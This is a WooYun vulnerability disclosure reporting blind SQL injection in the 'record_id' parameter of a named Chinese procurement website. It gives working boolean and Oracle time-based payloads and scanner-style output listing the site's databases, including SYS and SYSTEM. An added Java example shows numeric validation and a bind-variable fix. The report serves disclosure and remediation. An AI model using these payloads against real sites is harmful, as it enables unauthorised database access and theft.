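Vulnerability summary

Bug ID: wooyun-2013-044679

Title: Sensitive information disclosure # Oracle injection vulnerability in China Procurement and Bidding Network (中国采购与招标网)

Vendor: chinabidding.com.cn

Reported by: adm1n

Submitted: 2013-12-02 13:21

Fixed: 2014-01-16 13:22

Disclosed: 2014-01-16 13:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]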

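Vulnerability details

Disclosure status:

2013-12-02: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2014-01-16: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Oracle injection vulnerability in China Procurement and Bidding Network

Detailed description:

1. http://www.chinabidding.com.cn/zbw/zbxx/zbgg/sbiao_tj.jsp?op=op_browse&record_id=9138207

Proof of vulnerability: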

Place: GET
Parameter: record_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: op=op_browse&record_id=9138207 AND 2969=2969
Type: AND/OR time-based blind
Title: Oracle OR time-based blind
Payload: op=op_browse&record_id=-2674 OR 7281=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(114)||CHR(110)||CHR(109),5)
---
[17:37:41] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
current user: 'INFOSERVICE'
Database: JOINSPIDER
[99 tables]
Database: OUTLN
[3 tables]
Database: CBL_ZHANGHT
[46 tables]
Database: INFOSERVICE
[195 tables]
Database: SYSTEM
[41 tables]
Database: SYS
[677 tables]

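Remediation:

Filter the input. Please take security seriously and fix this quickly~

Copyright notice: when reposting, please credit the source adm1n@WooYun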
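
One way to apply the "filter" advice to the `record_id` parameter of a JSP back end, shown as an added example that is not part of the original report and is not the site's own code: validate the value as a number, then pass it to Oracle as a bind variable. The page does not show the server-side query, so the class and method names, the table `notice` and the column `title` are hypothetical.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.regex.Pattern;

public class RecordLookup {
    // record_id is a numeric key in the reported URL. Accept 1 to 18 ASCII
    // digits only; 18 digits always fits in a long, so parsing cannot overflow.
    private static final Pattern DIGITS = Pattern.compile("[0-9]{1,18}");

    /** Parses the raw request parameter, rejecting anything that is not purely numeric. */
    static long parseRecordId(String raw) {
        if (raw == null || !DIGITS.matcher(raw).matches()) {
            throw new IllegalArgumentException("record_id must be numeric");
        }
        return Long.parseLong(raw);
    }

    /**
     * Looks the record up with a bind variable, so the value is never parsed as SQL.
     * Table "notice" and column "title" are hypothetical (assumption).
     */
    static String findTitle(Connection conn, String rawRecordId) throws SQLException {
        long id = parseRecordId(rawRecordId);
        String sql = "SELECT title FROM notice WHERE record_id = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setLong(1, id);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString(1) : null;
            }
        }
    }

    /** Offline check of the validator against the parameter values shown in the report. */
    public static void main(String[] args) {
        String[] samples = {
            "9138207",
            "9138207 AND 2969=2969",
            "-2674 OR 7281=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(114)||CHR(110)||CHR(109),5)"
        };
        for (String s : samples) {
            try {
                System.out.println("accepted: " + parseRecordId(s));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + s);
            }
        }
    }
}
```

Separately from the query fix, the output above lists tables in SYS and SYSTEM through the application's connection (current user INFOSERVICE), so the grants held by that account are worth reviewing.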


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively refused
